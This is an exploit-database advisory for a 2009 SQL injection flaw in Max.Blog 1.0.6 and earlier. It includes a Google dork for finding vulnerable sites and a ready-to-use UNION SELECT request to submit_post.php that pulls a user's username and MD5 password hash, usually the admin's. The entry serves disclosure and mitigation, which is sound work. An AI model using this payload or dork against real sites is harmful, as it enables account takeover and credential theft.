header-logo
Suggest Exploit
vendor:
Max.Blog
by:
Salvatore 'drosophila' Fresta
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Max.Blog
Affected Version From: Max.Blog <= 1.0.6
Affected Version To: Max.Blog <= 1.0.6
Patch Exists: NO
Related CWE: N/A
CPE: a:mzbservices:max.blog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SQL Injection in Max.Blog <= 1.0.6

This bug allows a registered user to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) by sending a crafted request to submit_post.php with magic quotes set to off.

Mitigation:

Ensure that magic quotes are enabled and that user input is properly sanitized and validated.
Source

Exploit-DB raw data:

###################             Salvatore "drosophila" Fresta
###################


Application:    Max.Blog
                               http://www.mzbservices.com
Version:                Max.Blog <= 1.0.6
Bug:            * SQL Injection
Exploitation:   Remote
Dork:                   intext:"Powered by Max.Blog"
Date:           27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                       e-mail: drosophilaxxx@gmail.com


############################################################################

- BUGS

SQL Injection:

       Requisites: magic quotes = off

       File affected: submit_post.php

       This bug allows a registered user to view username and password
(md5) of a
       registered user with the specified id (usually 1 for the admin)

       http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23

############################################################################

# milw0rm.com [2009-01-28]